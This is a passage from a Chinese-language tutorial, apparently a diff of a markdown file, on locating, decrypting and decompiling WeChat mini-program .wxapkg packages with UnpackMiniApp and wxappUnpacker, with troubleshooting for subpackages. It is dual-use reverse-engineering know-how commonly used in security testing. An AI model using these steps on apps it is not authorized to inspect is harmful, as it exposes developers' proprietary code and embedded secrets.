进行查看,例如以下路径: + +``` +C:\Users\whomai\Documents\WeChat Files\ +``` + +在 PC 端打开一个小程序,尽可能点开所有的页面,让本地自动生成一个包,在上一步设置好的路径中的 Applet 文件夹下: + +``` +C:\Users\whomai\Documents\WeChat Files\Applet\ +``` + +Applet 文件夹下会有一个命名如 wx123a14a44d216eb9 的文件夹,包含一个命名为 `__APP__.wxapkg` 的加密文件,例如以下路径: + +``` +C:\Users\whomai\Documents\WeChat Files\Applet\wx123a14a44d216eb9\30\__APP__.wxapkg +``` + +## 三、解密小程序 + +使用 UnpackMiniApp 解密,解密后的文件保存在 UnpackMiniApp\wxpack 文件夹中,例如以下路径: + +``` +C:\Users\whomai\UnpackMiniApp\wxpack\wx1fc0bc98754321a1.wxapkg +``` + +## 四、逆向小程序 + +CMD 打开 wxappUnpacker,输入以下命令进行反编译: + +``` +bingo.bat <.wxapkg包路径> +``` + +反编译后的文件将和 .wxapkg 文件在同一个文件夹中并自动命名,此时即可查看反编译后的小程序代码。 + +## 五、可能出现的错误 + +### 0x01 执行命令时报错 + +如果出现以下错误: + +``` +this package is a subPackage which should be unpacked with -s=. +``` + +说明当前小程序包是分包,打开小程序时生成了两个 .wxapkg文件,编译另一个文件即可,编译分包和主包的命令是不一样的: + +``` +node ./wuWxapkg.js 分包路径 -s=主包路径 +``` + +### 0x02 生成的文件不包含app.json文件 + +说明当前小程序可能已经做了反编译安全措施,解密失败。但这种情况是比较少见的。 \ No newline at end of file